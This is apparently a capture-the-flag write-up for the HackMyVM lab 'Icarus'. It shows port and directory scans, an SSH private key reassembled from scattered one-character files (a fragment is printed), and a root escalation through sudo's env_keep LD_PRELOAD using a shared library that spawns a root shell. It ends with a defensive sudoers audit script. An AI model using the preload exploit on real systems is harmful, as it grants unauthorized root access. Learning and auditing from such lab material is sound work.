HackMyVM - Icarus
Icarus is a medium-difficulty VM by "sml" that I somehow blundered my way through...
Quite a nice VM, and it made me think!
Find it
└─$ sudo netdiscover -r 10.0.0.0/24 -P
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:95:67:5b 1 60 PCS Systemtechnik GmbH
10.0.0.111 08:00:27:6d:e2:b6 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
nmap
# Nmap 7.91 scan initiated Wed Dec 29 12:56:30 2021 as: nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.111
Nmap scan report for 10.0.0.111
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b6:65:56:40:8d:a8:57:b9:15:1e:0e:1f:a5:d0:52:3a (RSA)
| 256 79:65:cb:2a:06:82:13:d3:76:6b:1c:55:cd:8f:07:b7 (ECDSA)
|_ 256 b1:34:e5:21:a0:28:30:c0:6c:01:0e:b0:7b:8f:b8:c6 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: LOGIN
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.111/ -x html,php,txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.111/
[+] Method: GET
[+] Threads: 150
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/12/30 06:35:12 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 407]
/xml (Status: 200) [Size: 1]
/login.php (Status: 200) [Size: 407]
/a (Status: 200) [Size: 9641]
/xxx (Status: 200) [Size: 1]
/check.php (Status: 200) [Size: 21]
/xsl (Status: 200) [Size: 1]
/xbl (Status: 200) [Size: 1]
/xap (Status: 200) [Size: 1]
/xav (Status: 200) [Size: 1]
/xss (Status: 200) [Size: 1]
... <lots of other files beginning with x*>
User
The file "a" was the largest, so it is a reasonable place to start.
wget http://10.0.0.111/a
This appears to be a list of all the files, so let's just download them all and see if anything turns up.
mkdir xfiles
cat fetch.sh
#!/bin/sh
# read each filename listed in "a"; the || [ -n "$p" ] also catches a last line without a trailing newline
while IFS="" read -r p || [ -n "$p" ]
do
printf '%s\n' "$p"
wget --directory-prefix=xfiles/ "http://10.0.0.111/$p"
done < a
This downloads them all; now see whether there is anything useful in any of them...
cd xfiles
cat x*
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS
afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS
TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw....
Out of chaos comes order... each file is only one character long, but put together they build an SSH private key.
The username was a little more fun, but I eventually found it was icarus (yes, it took me a while to try the name of the server!).
So copy and paste the revealed private key into icarus.key:
chmod 600 icarus.key
ssh icarus@10.0.0.111 -i icarus.key
Escalate to root
icarus@icarus:~$ sudo -l
Matching Defaults entries for icarus on icarus:
env_reset, mail_badpass, env_keep+=LD_PRELOAD,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icarus may run the following commands on icarus:
(ALL : ALL) NOPASSWD: /usr/bin/id
icarus@icarus:~$
Listing sudo rights: "id" on its own is useless, but sudo keeps LD_PRELOAD from the caller's environment (env_keep+=LD_PRELOAD), so we can preload our own library into it!
Create a file shell.c in /tmp:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setgid/setuid prototypes */

/* _init runs when the library is loaded, before id's main() */
void _init() {
unsetenv("LD_PRELOAD"); /* don't preload into the spawned shell as well */
setgid(0);
setuid(0);
system("/bin/sh");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so id
And it's rooted.
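From the defender's side, the weakness here is not /usr/bin/id but the env_keep+=LD_PRELOAD entry in the sudo -l output, which undoes sudo's normal scrubbing of loader variables for every command the user may run. The following script is an added example (not from the original writeup) that audits a sudoers-format file for loader variables preserved across sudo and lists the passwordless commands they expose. The two sudoers snippets it checks are constructed: the weak one mirrors the sudo -l listing above, the hardened one has the env_keep line removed. The function names find_ld_env_keep, list_nopasswd_cmds, audit_sudoers and audit_demo are my own.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a sudoers file for
# the setting the escalation above relies on. sudo's env_reset normally
# scrubs LD_PRELOAD, but "Defaults env_keep += LD_PRELOAD" re-enables it for
# every command the user may run, so a harmless NOPASSWD entry such as
# /usr/bin/id becomes a root shell. The sudoers text below is constructed;
# on a real host run the checks against /etc/sudoers and /etc/sudoers.d/*.

# Usage: find_ld_env_keep FILE
# Prints uncommented Defaults lines that keep a dynamic-loader variable.
# Returns 0 if any were found (weak config), 1 if none.
find_ld_env_keep() {
    grep -E '^[[:space:]]*Defaults[^#]*env_keep[[:space:]]*[+]?=' "$1" \
        | grep -E 'LD_(PRELOAD|LIBRARY_PATH|AUDIT)'
}

# Usage: list_nopasswd_cmds FILE
# Prints the passwordless command specs; each one is reachable with the
# preload trick whenever find_ld_env_keep fires.
list_nopasswd_cmds() {
    grep -vE '^[[:space:]]*#' "$1" | grep -E 'NOPASSWD:'
}

# Usage: audit_sudoers FILE
# Prints a verdict and returns 0 when the file is weak, 1 when it is not.
audit_sudoers() {
    if find_ld_env_keep "$1" >/dev/null; then
        echo "WEAK: $1 keeps loader variables across sudo:"
        find_ld_env_keep "$1" | sed 's/^/    /'
        echo "  passwordless commands exposed by this:"
        list_nopasswd_cmds "$1" | sed 's/^/    /'
        return 0
    fi
    echo "OK: $1 does not preserve loader variables"
    return 1
}

# Self-check on two constructed files: the weak one mirrors the sudo -l
# output in the writeup, the hardened one simply drops the env_keep line
# (sudo's default env_reset then scrubs LD_PRELOAD). Returns 0 if the
# audit flags the weak file and passes the hardened one.
audit_demo() {
    weak=$(mktemp) || return 1
    hard=$(mktemp) || return 1
    cat >"$weak" <<'EOF'
Defaults        env_reset, mail_badpass
Defaults        env_keep += "LD_PRELOAD"
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
icarus  ALL=(ALL:ALL) NOPASSWD: /usr/bin/id
EOF
    cat >"$hard" <<'EOF'
Defaults        env_reset, mail_badpass
# Defaults      env_keep += "LD_PRELOAD"   <- removed; kept here only as a comment
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
icarus  ALL=(ALL:ALL) NOPASSWD: /usr/bin/id
EOF
    rc=1
    if audit_sudoers "$weak" && ! audit_sudoers "$hard"; then
        rc=0
    fi
    rm -f "$weak" "$hard"
    return $rc
}

if audit_demo; then echo "self-check passed"; else echo "self-check FAILED"; fi
```

The check is deliberately simple: it reads one file at a time and does not follow #include / #includedir directives or backslash-continued lines, so point it at every file sudo actually reads. The fix it demonstrates is just deleting the env_keep line; with env_reset in effect sudo drops LD_PRELOAD on its own, and /usr/bin/id goes back to being harmless.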